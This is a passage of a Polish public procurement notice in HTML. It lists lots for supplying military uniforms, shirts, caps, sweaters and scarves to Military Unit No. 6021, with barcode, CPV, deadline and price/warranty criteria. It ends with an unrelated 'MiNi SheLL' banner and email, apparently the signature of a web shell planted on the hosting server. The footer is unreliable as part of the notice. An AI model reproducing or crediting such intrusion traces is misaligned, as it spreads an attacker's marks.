Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.13.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021: 
Płaszcze, Mundury, Spodnie , Koszule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. 
1)	Płaszcz sukienny wojsk lądowych z materiału zamawiającego
2)	Mundur wyjściowy wojsk lądowych z materiału zamawiającego
3)	Mundur wyjściowy wojsk lądowych 
4)	Mundur wyjściowy damski ze spódnicą wojsk lądowych z materiału zamawiającego
5)	Mundur wyjściowy damski ze spódnicą wojsk lądowych
6)	Mundur wyjściowy letni wojsk lądowych z materiału zamawiającego  
7)	Mundur wyjściowy letni wojsk lądowych 
8)	Mundur wyjściowy letni damski ze spódnicą wojsk lądowych z materiału zamawiającego 
9)	Mundur wyjściowy letni damski ze spódnicą wojsk lądowych 
10)	Mundur służbowy wojsk lądowych KRWP 
11)	Płaszcz służbowy wojsk lądowych KRWP z materiału zamawiającego   
12)	Płaszcz służbowy wojsk lądowych KRWP   
13)	Mundur wyjściowy damski ze spódnicą marynarki wojennej    
14)	Spodnie wyjściowe letnie wojsk lądowych 
15)	Spodnie wyjściowe damskie wojsk lądowych z materiału zamawiającego
16)	Spodnie wyjściowe letnie damskie wojsk lądowych z materiału zamawiającego
17)	Spodnie wyjściowe letnie damskie wojsk lądowych
18)	Kurtka wiatrówka wojsk lądowych 
19)	Koszula damska koloru khaki 
20)	Koszula damska koloru białego 
21)	Koszulo-bluza damska z długimi rękawami koloru khaki 
22)	Koszulo-bluza damska z krótkimi rękawami koloru khaki 
23)	Koszulo-bluza damska z krótkimi rękawami koloru białego 
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.13.00-5, 18.21.20.00-8, 18.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Koszula oficerska koloru białego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ.
Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org.
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Koszula oficerska koloru khaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ.
Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org. Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Czapka garnizonowa szeregowego i podoficera wojsk lotniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ.
Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org.
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.33.20-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Sweter dla KRWP koloru khaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ.
Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org.
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.23.53.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Szalik zimowy oficerski koloru khaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ. 
Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org.
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dostawa przedmiotów umundurowania dla Jednostki Wojskowej Nr 6021:
Szalik zimowy oficerski koloru białego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia przedstawiono w załączniku Nr 1 oraz 1a do SIWZ.
Poszczególne przedmioty zamówienia oraz opakowania powinny być znakowane kodami kreskowymi umieszczonymi na etykietach jednostkowych i etykietach opakowań zbiorczych. Specyfikacja generalna GS1 oraz dokumenty pomocnicze dostępne są na stronach internetowych www.gs1.orgi www.gs1pl.org.
Dokument pomocniczy stanowią Wymagania w zakresie znakowania kodem kreskowym przedmiotów umundurowania i wyekwipowania, odzieży ochronnej i roboczej oraz sprzętu służby mundurowej dostarczanego do resortu obrony narodowej w ramach postępowania o udzielenie zamówienia publicznego opracowane przez Szefostwo Służby Mundurowej Inspektoratu Wsparcia Sił Zbrojnych, zgodnie z Załącznikiem Nr 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com